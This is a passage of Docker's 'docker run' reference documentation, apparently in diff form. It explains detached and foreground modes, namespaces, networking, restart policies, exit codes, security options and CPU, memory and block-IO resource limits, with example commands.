[Runtime constraints on resources](#runtime-constraints-on-resources) + - [Runtime privilege and Linux capabilities](#runtime-privilege-and-linux-capabilities) + +## Detached vs foreground + +When starting a Docker container, you must first decide if you want to +run the container in the background in a "detached" mode or in the +default foreground mode: + + -d=false: Detached mode: Run container in the background, print new container id + +### Detached (-d) + +To start a container in detached mode, you use `-d=true` or just `-d` option. By +design, containers started in detached mode exit when the root process used to +run the container exits. A container in detached mode cannot be automatically +removed when it stops, this means you cannot use the `--rm` option with `-d` option. + +Do not pass a `service x start` command to a detached container. For example, this +command attempts to start the `nginx` service. + + $ docker run -d -p 80:80 my_image service nginx start + +This succeeds in starting the `nginx` service inside the container. However, it +fails the detached container paradigm in that, the root process (`service nginx +start`) returns and the detached container stops as designed. As a result, the +`nginx` service is started but could not be used. Instead, to start a process +such as the `nginx` web server do the following: + + $ docker run -d -p 80:80 my_image nginx -g 'daemon off;' + +To do input/output with a detached container use network connections or shared +volumes. These are required because the container is no longer listening to the +command line where `docker run` was run. + +To reattach to a detached container, use `docker` +[*attach*](commandline/attach.md) command. + +### Foreground + +In foreground mode (the default when `-d` is not specified), `docker +run` can start the process in the container and attach the console to +the process's standard input, output, and standard error. It can even +pretend to be a TTY (this is what most command line executables expect) +and pass along signals. All of that is configurable: + + -a=[] : Attach to `STDIN`, `STDOUT` and/or `STDERR` + -t : Allocate a pseudo-tty + --sig-proxy=true: Proxy all received signals to the process (non-TTY mode only) + -i : Keep STDIN open even if not attached + +If you do not specify `-a` then Docker will [attach to both stdout and stderr +]( https://github.com/docker/docker/blob/4118e0c9eebda2412a09ae66e90c34b85fae3275/runconfig/opts/parse.go#L267). +You can specify to which of the three standard streams (`STDIN`, `STDOUT`, +`STDERR`) you'd like to connect instead, as in: + + $ docker run -a stdin -a stdout -i -t ubuntu /bin/bash + +For interactive processes (like a shell), you must use `-i -t` together in +order to allocate a tty for the container process. `-i -t` is often written `-it` +as you'll see in later examples. Specifying `-t` is forbidden when the client +standard output is redirected or piped, such as in: + + $ echo test | docker run -i busybox cat + +>**Note**: A process running as PID 1 inside a container is treated +>specially by Linux: it ignores any signal with the default action. +>So, the process will not terminate on `SIGINT` or `SIGTERM` unless it is +>coded to do so. + +## Container identification + +### Name (--name) + +The operator can identify a container in three ways: + +| Identifier type | Example value | +| --------------------- | ------------------------------------------------------------------ | +| UUID long identifier | "f78375b1c487e03c9438c729345e54db9d20cfa2ac1fc3494b6eb60872e74778" | +| UUID short identifier | "f78375b1c487" | +| Name | "evil_ptolemy" | + +The UUID identifiers come from the Docker daemon. If you do not assign a +container name with the `--name` option, then the daemon generates a random +string name for you. Defining a `name` can be a handy way to add meaning to a +container. If you specify a `name`, you can use it when referencing the +container within a Docker network. This works for both background and foreground +Docker containers. + +> **Note**: Containers on the default bridge network must be linked to +> communicate by name. + +### PID equivalent + +Finally, to help with automation, you can have Docker write the +container ID out to a file of your choosing. This is similar to how some +programs might write out their process ID to a file (you've seen them as +PID files): + + --cidfile="": Write the container ID to the file + +### Image[:tag] + +While not strictly a means of identifying a container, you can specify a version of an +image you'd like to run the container with by adding `image[:tag]` to the command. For +example, `docker run ubuntu:14.04`. + +### Image[@digest] + +Images using the v2 or later image format have a content-addressable identifier +called a digest. As long as the input used to generate the image is unchanged, +the digest value is predictable and referenceable. + +The following example runs a container from the `alpine` image with the +`sha256:9cacb71397b640eca97488cf08582ae4e4068513101088e9f96c9814bfda95e0` digest: + + $ docker run alpine@sha256:9cacb71397b640eca97488cf08582ae4e4068513101088e9f96c9814bfda95e0 date + +## PID settings (--pid) + + --pid="" : Set the PID (Process) Namespace mode for the container, + 'container:': joins another container's PID namespace + 'host': use the host's PID namespace inside the container + +By default, all containers have the PID namespace enabled. + +PID namespace provides separation of processes. The PID Namespace removes the +view of the system processes, and allows process ids to be reused including +pid 1. + +In certain cases you want your container to share the host's process namespace, +basically allowing processes within the container to see all of the processes +on the system. For example, you could build a container with debugging tools +like `strace` or `gdb`, but want to use these tools when debugging processes +within the container. + +### Example: run htop inside a container + +Create this Dockerfile: + +``` +FROM alpine:latest +RUN apk add --update htop && rm -rf /var/cache/apk/* +CMD ["htop"] +``` + +Build the Dockerfile and tag the image as `myhtop`: + +```bash +$ docker build -t myhtop . +``` + +Use the following command to run `htop` inside a container: + +``` +$ docker run -it --rm --pid=host myhtop +``` + +Joining another container's pid namespace can be used for debugging that container. + +### Example + +Start a container running a redis server: + +```bash +$ docker run --name my-redis -d redis +``` + +Debug the redis container by running another container that has strace in it: + +```bash +$ docker run -it --pid=container:my-redis my_strace_docker_image bash +$ strace -p 1 +``` + +## UTS settings (--uts) + + --uts="" : Set the UTS namespace mode for the container, + 'host': use the host's UTS namespace inside the container + +The UTS namespace is for setting the hostname and the domain that is visible +to running processes in that namespace. By default, all containers, including +those with `--network=host`, have their own UTS namespace. The `host` setting will +result in the container using the same UTS namespace as the host. Note that +`--hostname` is invalid in `host` UTS mode. + +You may wish to share the UTS namespace with the host if you would like the +hostname of the container to change as the hostname of the host changes. A +more advanced use case would be changing the host's hostname from a container. + +## IPC settings (--ipc) + + --ipc="" : Set the IPC mode for the container, + 'container:': reuses another container's IPC namespace + 'host': use the host's IPC namespace inside the container + +By default, all containers have the IPC namespace enabled. + +IPC (POSIX/SysV IPC) namespace provides separation of named shared memory +segments, semaphores and message queues. + +Shared memory segments are used to accelerate inter-process communication at +memory speed, rather than through pipes or through the network stack. Shared +memory is commonly used by databases and custom-built (typically C/OpenMPI, +C++/using boost libraries) high performance applications for scientific +computing and financial services industries. If these types of applications +are broken into multiple containers, you might need to share the IPC mechanisms +of the containers. + +## Network settings + + --dns=[] : Set custom dns servers for the container + --network="bridge" : Connect a container to a network + 'bridge': create a network stack on the default Docker bridge + 'none': no networking + 'container:': reuse another container's network stack + 'host': use the Docker host network stack + '|': connect to a user-defined network + --network-alias=[] : Add network-scoped alias for the container + --add-host="" : Add a line to /etc/hosts (host:IP) + --mac-address="" : Sets the container's Ethernet device's MAC address + --ip="" : Sets the container's Ethernet device's IPv4 address + --ip6="" : Sets the container's Ethernet device's IPv6 address + --link-local-ip=[] : Sets one or more container's Ethernet device's link local IPv4/IPv6 addresses + +By default, all containers have networking enabled and they can make any +outgoing connections. The operator can completely disable networking +with `docker run --network none` which disables all incoming and outgoing +networking. In cases like this, you would perform I/O through files or +`STDIN` and `STDOUT` only. + +Publishing ports and linking to other containers only works with the default (bridge). The linking feature is a legacy feature. You should always prefer using Docker network drivers over linking. + +Your container will use the same DNS servers as the host by default, but +you can override this with `--dns`. + +By default, the MAC address is generated using the IP address allocated to the +container. You can set the container's MAC address explicitly by providing a +MAC address via the `--mac-address` parameter (format:`12:34:56:78:9a:bc`).Be +aware that Docker does not check if manually specified MAC addresses are unique. + +Supported networks : + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NetworkDescription
none + No networking in the container. +
bridge (default) + Connect the container to the bridge via veth interfaces. +
host + Use the host's network stack inside the container. +
container:<name|id> + Use the network stack of another container, specified via + its name or id. +
NETWORK + Connects the container to a user created network (using docker network create command) +
+ +#### Network: none + +With the network is `none` a container will not have +access to any external routes. The container will still have a +`loopback` interface enabled in the container but it does not have any +routes to external traffic. + +#### Network: bridge + +With the network set to `bridge` a container will use docker's +default networking setup. A bridge is setup on the host, commonly named +`docker0`, and a pair of `veth` interfaces will be created for the +container. One side of the `veth` pair will remain on the host attached +to the bridge while the other side of the pair will be placed inside the +container's namespaces in addition to the `loopback` interface. An IP +address will be allocated for containers on the bridge's network and +traffic will be routed though this bridge to the container. + +Containers can communicate via their IP addresses by default. To communicate by +name, they must be linked. + +#### Network: host + +With the network set to `host` a container will share the host's +network stack and all interfaces from the host will be available to the +container. The container's hostname will match the hostname on the host +system. Note that `--mac-address` is invalid in `host` netmode. Even in `host` +network mode a container has its own UTS namespace by default. As such +`--hostname` is allowed in `host` network mode and will only change the +hostname inside the container. +Similar to `--hostname`, the `--add-host`, `--dns`, `--dns-search`, and +`--dns-option` options can be used in `host` network mode. These options update +`/etc/hosts` or `/etc/resolv.conf` inside the container. No change are made to +`/etc/hosts` and `/etc/resolv.conf` on the host. + +Compared to the default `bridge` mode, the `host` mode gives *significantly* +better networking performance since it uses the host's native networking stack +whereas the bridge has to go through one level of virtualization through the +docker daemon. It is recommended to run containers in this mode when their +networking performance is critical, for example, a production Load Balancer +or a High Performance Web Server. + +> **Note**: `--network="host"` gives the container full access to local system +> services such as D-bus and is therefore considered insecure. + +#### Network: container + +With the network set to `container` a container will share the +network stack of another container. The other container's name must be +provided in the format of `--network container:`. Note that `--add-host` +`--hostname` `--dns` `--dns-search` `--dns-option` and `--mac-address` are +invalid in `container` netmode, and `--publish` `--publish-all` `--expose` are +also invalid in `container` netmode. + +Example running a Redis container with Redis binding to `localhost` then +running the `redis-cli` command and connecting to the Redis server over the +`localhost` interface. + + $ docker run -d --name redis example/redis --bind 127.0.0.1 + $ # use the redis container's network stack to access localhost + $ docker run --rm -it --network container:redis example/redis-cli -h 127.0.0.1 + +#### User-defined network + +You can create a network using a Docker network driver or an external network +driver plugin. You can connect multiple containers to the same network. Once +connected to a user-defined network, the containers can communicate easily using +only another container's IP address or name. + +For `overlay` networks or custom plugins that support multi-host connectivity, +containers connected to the same multi-host network but launched from different +Engines can also communicate in this way. + +The following example creates a network using the built-in `bridge` network +driver and running a container in the created network + +``` +$ docker network create -d bridge my-net +$ docker run --network=my-net -itd --name=container3 busybox +``` + +### Managing /etc/hosts + +Your container will have lines in `/etc/hosts` which define the hostname of the +container itself as well as `localhost` and a few other common things. The +`--add-host` flag can be used to add additional lines to `/etc/hosts`. + + $ docker run -it --add-host db-static:86.75.30.9 ubuntu cat /etc/hosts + 172.17.0.22 09d03f76bf2c + fe00::0 ip6-localnet + ff00::0 ip6-mcastprefix + ff02::1 ip6-allnodes + ff02::2 ip6-allrouters + 127.0.0.1 localhost + ::1 localhost ip6-localhost ip6-loopback + 86.75.30.9 db-static + +If a container is connected to the default bridge network and `linked` +with other containers, then the container's `/etc/hosts` file is updated +with the linked container's name. + +If the container is connected to user-defined network, the container's +`/etc/hosts` file is updated with names of all other containers in that +user-defined network. + +> **Note** Since Docker may live update the container’s `/etc/hosts` file, there +may be situations when processes inside the container can end up reading an +empty or incomplete `/etc/hosts` file. In most cases, retrying the read again +should fix the problem. + +## Restart policies (--restart) + +Using the `--restart` flag on Docker run you can specify a restart policy for +how a container should or should not be restarted on exit. + +When a restart policy is active on a container, it will be shown as either `Up` +or `Restarting` in [`docker ps`](commandline/ps.md). It can also be +useful to use [`docker events`](commandline/events.md) to see the +restart policy in effect. + +Docker supports the following restart policies: + + + + + + + + + + + + + + + + + + + + + + + + + + +
PolicyResult
no + Do not automatically restart the container when it exits. This is the + default. +
+ + on-failure[:max-retries] + + + Restart only if the container exits with a non-zero exit status. + Optionally, limit the number of restart retries the Docker + daemon attempts. +
always + Always restart the container regardless of the exit status. + When you specify always, the Docker daemon will try to restart + the container indefinitely. The container will also always start + on daemon startup, regardless of the current state of the container. +
unless-stopped + Always restart the container regardless of the exit status, but + do not start it on daemon startup if the container has been put + to a stopped state before. +
+ +An ever increasing delay (double the previous delay, starting at 100 +milliseconds) is added before each restart to prevent flooding the server. +This means the daemon will wait for 100 ms, then 200 ms, 400, 800, 1600, +and so on until either the `on-failure` limit is hit, or when you `docker stop` +or `docker rm -f` the container. + +If a container is successfully restarted (the container is started and runs +for at least 10 seconds), the delay is reset to its default value of 100 ms. + +You can specify the maximum amount of times Docker will try to restart the +container when using the **on-failure** policy. The default is that Docker +will try forever to restart the container. The number of (attempted) restarts +for a container can be obtained via [`docker inspect`](commandline/inspect.md). For example, to get the number of restarts +for container "my-container"; + + {% raw %} + $ docker inspect -f "{{ .RestartCount }}" my-container + # 2 + {% endraw %} + +Or, to get the last time the container was (re)started; + + {% raw %} + $ docker inspect -f "{{ .State.StartedAt }}" my-container + # 2015-03-04T23:47:07.691840179Z + {% endraw %} + + +Combining `--restart` (restart policy) with the `--rm` (clean up) flag results +in an error. On container restart, attached clients are disconnected. See the +examples on using the [`--rm` (clean up)](#clean-up-rm) flag later in this page. + +### Examples + + $ docker run --restart=always redis + +This will run the `redis` container with a restart policy of **always** +so that if the container exits, Docker will restart it. + + $ docker run --restart=on-failure:10 redis + +This will run the `redis` container with a restart policy of **on-failure** +and a maximum restart count of 10. If the `redis` container exits with a +non-zero exit status more than 10 times in a row Docker will abort trying to +restart the container. Providing a maximum restart limit is only valid for the +**on-failure** policy. + +## Exit Status + +The exit code from `docker run` gives information about why the container +failed to run or why it exited. When `docker run` exits with a non-zero code, +the exit codes follow the `chroot` standard, see below: + +**_125_** if the error is with Docker daemon **_itself_** + + $ docker run --foo busybox; echo $? + # flag provided but not defined: --foo + See 'docker run --help'. + 125 + +**_126_** if the **_contained command_** cannot be invoked + + $ docker run busybox /etc; echo $? + # docker: Error response from daemon: Container command '/etc' could not be invoked. + 126 + +**_127_** if the **_contained command_** cannot be found + + $ docker run busybox foo; echo $? + # docker: Error response from daemon: Container command 'foo' not found or does not exist. + 127 + +**_Exit code_** of **_contained command_** otherwise + + $ docker run busybox /bin/sh -c 'exit 3'; echo $? + # 3 + +## Clean up (--rm) + +By default a container's file system persists even after the container +exits. This makes debugging a lot easier (since you can inspect the +final state) and you retain all your data by default. But if you are +running short-term **foreground** processes, these container file +systems can really pile up. If instead you'd like Docker to +**automatically clean up the container and remove the file system when +the container exits**, you can add the `--rm` flag: + + --rm=false: Automatically remove the container when it exits (incompatible with -d) + +> **Note**: When you set the `--rm` flag, Docker also removes the volumes +associated with the container when the container is removed. This is similar +to running `docker rm -v my-container`. Only volumes that are specified without a +name are removed. For example, with +`docker run --rm -v /foo -v awesome:/bar busybox top`, the volume for `/foo` will be removed, +but the volume for `/bar` will not. Volumes inherited via `--volumes-from` will be removed +with the same logic -- if the original volume was specified with a name it will **not** be removed. + +## Security configuration + --security-opt="label=user:USER" : Set the label user for the container + --security-opt="label=role:ROLE" : Set the label role for the container + --security-opt="label=type:TYPE" : Set the label type for the container + --security-opt="label=level:LEVEL" : Set the label level for the container + --security-opt="label=disable" : Turn off label confinement for the container + --security-opt="apparmor=PROFILE" : Set the apparmor profile to be applied to the container + --security-opt="no-new-privileges" : Disable container processes from gaining new privileges + --security-opt="seccomp=unconfined" : Turn off seccomp confinement for the container + --security-opt="seccomp=profile.json": White listed syscalls seccomp Json file to be used as a seccomp filter + + +You can override the default labeling scheme for each container by specifying +the `--security-opt` flag. Specifying the level in the following command +allows you to share the same content between containers. + + $ docker run --security-opt label=level:s0:c100,c200 -it fedora bash + +> **Note**: Automatic translation of MLS labels is not currently supported. + +To disable the security labeling for this container versus running with the +`--privileged` flag, use the following command: + + $ docker run --security-opt label=disable -it fedora bash + +If you want a tighter security policy on the processes within a container, +you can specify an alternate type for the container. You could run a container +that is only allowed to listen on Apache ports by executing the following +command: + + $ docker run --security-opt label=type:svirt_apache_t -it centos bash + +> **Note**: You would have to write policy defining a `svirt_apache_t` type. + +If you want to prevent your container processes from gaining additional +privileges, you can execute the following command: + + $ docker run --security-opt no-new-privileges -it centos bash + +This means that commands that raise privileges such as `su` or `sudo` will no longer work. +It also causes any seccomp filters to be applied later, after privileges have been dropped +which may mean you can have a more restrictive set of filters. +For more details, see the [kernel documentation](https://www.kernel.org/doc/Documentation/prctl/no_new_privs.txt). + +## Specifying custom cgroups + +Using the `--cgroup-parent` flag, you can pass a specific cgroup to run a +container in. This allows you to create and manage cgroups on their own. You can +define custom resources for those cgroups and put containers under a common +parent group. + +## Runtime constraints on resources + +The operator can also adjust the performance parameters of the +container: + +| Option | Description | +| -------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------- | +| `-m`, `--memory=""` | Memory limit (format: `[]`). Number is a positive integer. Unit can be one of `b`, `k`, `m`, or `g`. Minimum is 4M. | +| `--memory-swap=""` | Total memory limit (memory + swap, format: `[]`). Number is a positive integer. Unit can be one of `b`, `k`, `m`, or `g`. | +| `--memory-reservation=""` | Memory soft limit (format: `[]`). Number is a positive integer. Unit can be one of `b`, `k`, `m`, or `g`. | +| `--kernel-memory=""` | Kernel memory limit (format: `[]`). Number is a positive integer. Unit can be one of `b`, `k`, `m`, or `g`. Minimum is 4M. | +| `-c`, `--cpu-shares=0` | CPU shares (relative weight) | +| `--cpus=0.000` | Number of CPUs. Number is a fractional number. 0.000 means no limit. | +| `--cpu-period=0` | Limit the CPU CFS (Completely Fair Scheduler) period | +| `--cpuset-cpus=""` | CPUs in which to allow execution (0-3, 0,1) | +| `--cpuset-mems=""` | Memory nodes (MEMs) in which to allow execution (0-3, 0,1). Only effective on NUMA systems. | +| `--cpu-quota=0` | Limit the CPU CFS (Completely Fair Scheduler) quota | +| `--cpu-rt-period=0` | Limit the CPU real-time period. In microseconds. Requires parent cgroups be set and cannot be higher than parent. Also check rtprio ulimits. | +| `--cpu-rt-runtime=0` | Limit the CPU real-time runtime. In microseconds. Requires parent cgroups be set and cannot be higher than parent. Also check rtprio ulimits. | +| `--blkio-weight=0` | Block IO weight (relative weight) accepts a weight value between 10 and 1000. | +| `--blkio-weight-device=""` | Block IO weight (relative device weight, format: `DEVICE_NAME:WEIGHT`) | +| `--device-read-bps=""` | Limit read rate from a device (format: `:[]`). Number is a positive integer. Unit can be one of `kb`, `mb`, or `gb`. | +| `--device-write-bps=""` | Limit write rate to a device (format: `:[]`). Number is a positive integer. Unit can be one of `kb`, `mb`, or `gb`. | +| `--device-read-iops="" ` | Limit read rate (IO per second) from a device (format: `:`). Number is a positive integer. | +| `--device-write-iops="" ` | Limit write rate (IO per second) to a device (format: `:`). Number is a positive integer. | +| `--oom-kill-disable=false` | Whether to disable OOM Killer for the container or not. | +| `--oom-score-adj=0` | Tune container's OOM preferences (-1000 to 1000) | +| `--memory-swappiness=""` | Tune a container's memory swappiness behavior. Accepts an integer between 0 and 100. | +| `--shm-size=""` | Size of `/dev/shm`. The format is ``. `number` must be greater than `0`. Unit is optional and can be `b` (bytes), `k` (kilobytes), `m` (megabytes), or `g` (gigabytes). If you omit the unit, the system uses bytes. If you omit the size entirely, the system uses `64m`. | + +### User memory constraints + +We have four ways to set user memory usage: + + + + + + + + + + + + + + + + + + + + + + + + + + +
OptionResult
+ memory=inf, memory-swap=inf (default) + + There is no memory limit for the container. The container can use + as much memory as needed. +
memory=L<inf, memory-swap=inf + (specify memory and set memory-swap as -1) The container is + not allowed to use more than L bytes of memory, but can use as much swap + as is needed (if the host supports swap memory). +
memory=L<inf, memory-swap=2*L + (specify memory without memory-swap) The container is not allowed to + use more than L bytes of memory, swap plus memory usage is double + of that. +
+ memory=L<inf, memory-swap=S<inf, L<=S + + (specify both memory and memory-swap) The container is not allowed to + use more than L bytes of memory, swap plus memory usage is limited + by S. +
+ +Examples: + + $ docker run -it ubuntu:14.04 /bin/bash + +We set nothing about memory, this means the processes in the container can use +as much memory and swap memory as they need. + + $ docker run -it -m 300M --memory-swap -1 ubuntu:14.04 /bin/bash + +We set memory limit and disabled swap memory limit, this means the processes in +the container can use 300M memory and as much swap memory as they need (if the +host supports swap memory). + + $ docker run -it -m 300M ubuntu:14.04 /bin/bash + +We set memory limit only, this means the processes in the container can use +300M memory and 300M swap memory, by default, the total virtual memory size +(--memory-swap) will be set as double of memory, in this case, memory + swap +would be 2*300M, so processes can use 300M swap memory as well. + + $ docker run -it -m 300M --memory-swap 1G ubuntu:14.04 /bin/bash + +We set both memory and swap memory, so the processes in the container can use +300M memory and 700M swap memory. + +Memory reservation is a kind of memory soft limit that allows for greater +sharing of memory. Under normal circumstances, containers can use as much of +the memory as needed and are constrained only by the hard limits set with the +`-m`/`--memory` option. When memory reservation is set, Docker detects memory +contention or low memory and forces containers to restrict their consumption to +a reservation limit. + +Always set the memory reservation value below the hard limit, otherwise the hard +limit takes precedence. A reservation of 0 is the same as setting no +reservation. By default (without reservation set), memory reservation is the +same as the hard memory limit. + +Memory reservation is a soft-limit feature and does not guarantee the limit +won't be exceeded. Instead, the feature attempts to ensure that, when memory is +heavily contended for, memory is allocated based on the reservation hints/setup. + +The following example limits the memory (`-m`) to 500M and sets the memory +reservation to 200M. + +```bash +$ docker run -it -m 500M --memory-reservation 200M ubuntu:14.04 /bin/bash +``` + +Under this configuration, when the container consumes memory more than 200M and +less than 500M, the next system memory reclaim attempts to shrink container +memory below 200M. + +The following example set memory reservation to 1G without a hard memory limit. + +```bash +$ docker run -it --memory-reservation 1G ubuntu:14.04 /bin/bash +``` + +The container can use as much memory as it needs. The memory reservation setting +ensures the container doesn't consume too much memory for long time, because +every memory reclaim shrinks the container's consumption to the reservation. + +By default, kernel kills processes in a container if an out-of-memory (OOM) +error occurs. To change this behaviour, use the `--oom-kill-disable` option. +Only disable the OOM killer on containers where you have also set the +`-m/--memory` option. If the `-m` flag is not set, this can result in the host +running out of memory and require killing the host's system processes to free +memory. + +The following example limits the memory to 100M and disables the OOM killer for +this container: + + $ docker run -it -m 100M --oom-kill-disable ubuntu:14.04 /bin/bash + +The following example, illustrates a dangerous way to use the flag: + + $ docker run -it --oom-kill-disable ubuntu:14.04 /bin/bash + +The container has unlimited memory which can cause the host to run out memory +and require killing system processes to free memory. The `--oom-score-adj` +parameter can be changed to select the priority of which containers will +be killed when the system is out of memory, with negative scores making them +less likely to be killed an positive more likely. + +### Kernel memory constraints + +Kernel memory is fundamentally different than user memory as kernel memory can't +be swapped out. The inability to swap makes it possible for the container to +block system services by consuming too much kernel memory. Kernel memory includes: + + - stack pages + - slab pages + - sockets memory pressure + - tcp memory pressure + +You can setup kernel memory limit to constrain these kinds of memory. For example, +every process consumes some stack pages. By limiting kernel memory, you can +prevent new processes from being created when the kernel memory usage is too high. + +Kernel memory is never completely independent of user memory. Instead, you limit +kernel memory in the context of the user memory limit. Assume "U" is the user memory +limit and "K" the kernel limit. There are three possible ways to set limits: + + + + + + + + + + + + + + + + + + + + + + +
OptionResult
U != 0, K = inf (default) + This is the standard memory limitation mechanism already present before using + kernel memory. Kernel memory is completely ignored. +
U != 0, K < U + Kernel memory is a subset of the user memory. This setup is useful in + deployments where the total amount of memory per-cgroup is overcommitted. + Overcommitting kernel memory limits is definitely not recommended, since the + box can still run out of non-reclaimable memory. + In this case, you can configure K so that the sum of all groups is + never greater than the total memory. Then, freely set U at the expense of + the system's service quality. +
U != 0, K > U + Since kernel memory charges are also fed to the user counter and reclamation + is triggered for the container for both kinds of memory. This configuration + gives the admin a unified view of memory. It is also useful for people + who just want to track kernel memory usage. +
+ +Examples: + + $ docker run -it -m 500M --kernel-memory 50M ubuntu:14.04 /bin/bash + +We set memory and kernel memory, so the processes in the container can use +500M memory in total, in this 500M memory, it can be 50M kernel memory tops. + + $ docker run -it --kernel-memory 50M ubuntu:14.04 /bin/bash + +We set kernel memory without **-m**, so the processes in the container can +use as much memory as they want, but they can only use 50M kernel memory. + +### Swappiness constraint + +By default, a container's kernel can swap out a percentage of anonymous pages. +To set this percentage for a container, specify a `--memory-swappiness` value +between 0 and 100. A value of 0 turns off anonymous page swapping. A value of +100 sets all anonymous pages as swappable. By default, if you are not using +`--memory-swappiness`, memory swappiness value will be inherited from the parent. + +For example, you can set: + + $ docker run -it --memory-swappiness=0 ubuntu:14.04 /bin/bash + +Setting the `--memory-swappiness` option is helpful when you want to retain the +container's working set and to avoid swapping performance penalties. + +### CPU share constraint + +By default, all containers get the same proportion of CPU cycles. This proportion +can be modified by changing the container's CPU share weighting relative +to the weighting of all other running containers. + +To modify the proportion from the default of 1024, use the `-c` or `--cpu-shares` +flag to set the weighting to 2 or higher. If 0 is set, the system will ignore the +value and use the default of 1024. + +The proportion will only apply when CPU-intensive processes are running. +When tasks in one container are idle, other containers can use the +left-over CPU time. The actual amount of CPU time will vary depending on +the number of containers running on the system. + +For example, consider three containers, one has a cpu-share of 1024 and +two others have a cpu-share setting of 512. When processes in all three +containers attempt to use 100% of CPU, the first container would receive +50% of the total CPU time. If you add a fourth container with a cpu-share +of 1024, the first container only gets 33% of the CPU. The remaining containers +receive 16.5%, 16.5% and 33% of the CPU. + +On a multi-core system, the shares of CPU time are distributed over all CPU +cores. Even if a container is limited to less than 100% of CPU time, it can +use 100% of each individual CPU core. + +For example, consider a system with more than three cores. If you start one +container `{C0}` with `-c=512` running one process, and another container +`{C1}` with `-c=1024` running two processes, this can result in the following +division of CPU shares: + + PID container CPU CPU share + 100 {C0} 0 100% of CPU0 + 101 {C1} 1 100% of CPU1 + 102 {C1} 2 100% of CPU2 + +### CPU period constraint + +The default CPU CFS (Completely Fair Scheduler) period is 100ms. We can use +`--cpu-period` to set the period of CPUs to limit the container's CPU usage. +And usually `--cpu-period` should work with `--cpu-quota`. + +Examples: + + $ docker run -it --cpu-period=50000 --cpu-quota=25000 ubuntu:14.04 /bin/bash + +If there is 1 CPU, this means the container can get 50% CPU worth of run-time every 50ms. + +In addition to use `--cpu-period` and `--cpu-quota` for setting CPU period constraints, +it is possible to specify `--cpus` with a float number to achieve the same purpose. +For example, if there is 1 CPU, then `--cpus=0.5` will achieve the same result as +setting `--cpu-period=50000` and `--cpu-quota=25000` (50% CPU). + +The default value for `--cpus` is `0.000`, which means there is no limit. + +For more information, see the [CFS documentation on bandwidth limiting](https://www.kernel.org/doc/Documentation/scheduler/sched-bwc.txt). + +### Cpuset constraint + +We can set cpus in which to allow execution for containers. + +Examples: + + $ docker run -it --cpuset-cpus="1,3" ubuntu:14.04 /bin/bash + +This means processes in container can be executed on cpu 1 and cpu 3. + + $ docker run -it --cpuset-cpus="0-2" ubuntu:14.04 /bin/bash + +This means processes in container can be executed on cpu 0, cpu 1 and cpu 2. + +We can set mems in which to allow execution for containers. Only effective +on NUMA systems. + +Examples: + + $ docker run -it --cpuset-mems="1,3" ubuntu:14.04 /bin/bash + +This example restricts the processes in the container to only use memory from +memory nodes 1 and 3. + + $ docker run -it --cpuset-mems="0-2" ubuntu:14.04 /bin/bash + +This example restricts the processes in the container to only use memory from +memory nodes 0, 1 and 2. + +### CPU quota constraint + +The `--cpu-quota` flag limits the container's CPU usage. The default 0 value +allows the container to take 100% of a CPU resource (1 CPU). The CFS (Completely Fair +Scheduler) handles resource allocation for executing processes and is default +Linux Scheduler used by the kernel. Set this value to 50000 to limit the container +to 50% of a CPU resource. For multiple CPUs, adjust the `--cpu-quota` as necessary. +For more information, see the [CFS documentation on bandwidth limiting](https://www.kernel.org/doc/Documentation/scheduler/sched-bwc.txt). + +### Block IO bandwidth (Blkio) constraint + +By default, all containers get the same proportion of block IO bandwidth +(blkio). This proportion is 500. To modify this proportion, change the +container's blkio weight relative to the weighting of all other running +containers using the `--blkio-weight` flag. + +> **Note:** The blkio weight setting is only available for direct IO. Buffered IO +> is not currently supported. + +The `--blkio-weight` flag can set the weighting to a value between 10 to 1000. +For example, the commands below create two containers with different blkio +weight: + + $ docker run -it --name c1 --blkio-weight 300 ubuntu:14.04 /bin/bash + $ docker run -it --name c2 --blkio-weight 600 ubuntu:14.04 /bin/bash + +If you do block IO in the two containers at the same time, by, for example: + + $ time dd if=/mnt/zerofile of=test.out bs=1M count=1024 oflag=direct + +You'll find that the proportion of time is the same as the proportion of blkio +weights of the two containers. + +The `--blkio-weight-device="DEVICE_NAME:WEIGHT"` flag sets a specific device weight. +The `DEVICE_NAME:WEIGHT` is a string containing a colon-separated device name and weight. +For example, to set `/dev/sda` device weight to `200`: + + $ docker run -it \ + --blkio-weight-device "/dev/sda:200" \ + ubuntu + +If you specify both the `--blkio-weight` and `--blkio-weight-device`, Docker +uses the `--blkio-weight` as the default weight and uses `--blkio-weight-device` +to override this default with a new value on a specific device. +The following example uses a default weight of `300` and overrides this default +on `/dev/sda` setting that weight to `200`: + + $ docker run -it \ + --blkio-weight 300 \ + --blkio-weight-device "/dev/sda:200" \ + ubuntu + +The `--device-read-bps` flag limits the read rate (bytes per second) from a device. +For example, this command creates a container and limits the read rate to `1mb` +per second from `/dev/sda`: + + $ docker run -it --device-read-bps /dev/sda:1mb ubuntu + +The `--device-write-bps` flag limits the write rate (bytes per second)to a device. +For example, this command creates a container and limits the write rate to `1mb` +per second for `/dev/sda`: + + $ docker run -it --device-write-bps /dev/sda:1mb ubuntu + +Both flags take limits in the `:[unit]` format. Both read +and write rates must be a positive integer. You can specify the rate in `kb` +(kilobytes), `mb` (megabytes), or `gb` (gigabytes). + +The `--device-read-iops` flag limits read rate (IO per second) from a device. +For example, this command creates a container and limits the read rate to +`1000` IO per second from `/dev/sda`: + + $ docker run -ti --device-read-iops /dev/sda:1000 ubuntu + +The `--device-write-iops` flag limits write rate (IO per second) to a device. +For example, this command creates a container and limits the write rate to +`1000` IO per second to `/dev/sda`: + + $ docker run -ti --device-write-iops /dev/sda:1000 ubuntu + +Both flags take limits in the `:` format. Both read and +write rates must be a positive integer. + +## Additional groups + --group-add: Add additional groups to run as + +By default, the docker container process runs with the supplementary groups looked +up for the specified user. If one wants to add more to that list of groups, then +one can use this flag: + + $ docker run --rm --group-add audio --group-add nogroup --group-add 777 busybox id + uid=0(root) gid=0(root) groups=10(wheel),29(audio),99(nogroup),777 + +## Runtime privilege and Linux capabilities + + --cap-add: Add Linux capabilities + --cap-drop: Drop Linux capabilities + --privileged=false: Give extended privileges to this container + --device=[]: Allows you to run devices inside the container without the --privileged flag. + +By default, Docker containers are "unprivileged" and cannot, for +example, run a Docker daemon inside a Docker container. This is because +by default a container is not allowed to access any devices, but a +"privileged" container is given access to all devices (see +the documentation on [cgroups devices](https://www.kernel.org/doc/Documentation/cgroup-v1/devices.txt)). + +When the operator executes `docker run --privileged`, Docker will enable +to access to all devices on the host as well as set some configuration +in AppArmor or SELinux to allow the container nearly all the same access to the +host as processes running outside containers on the host. Additional +information about running with `--privileged` is available on the +[Docker 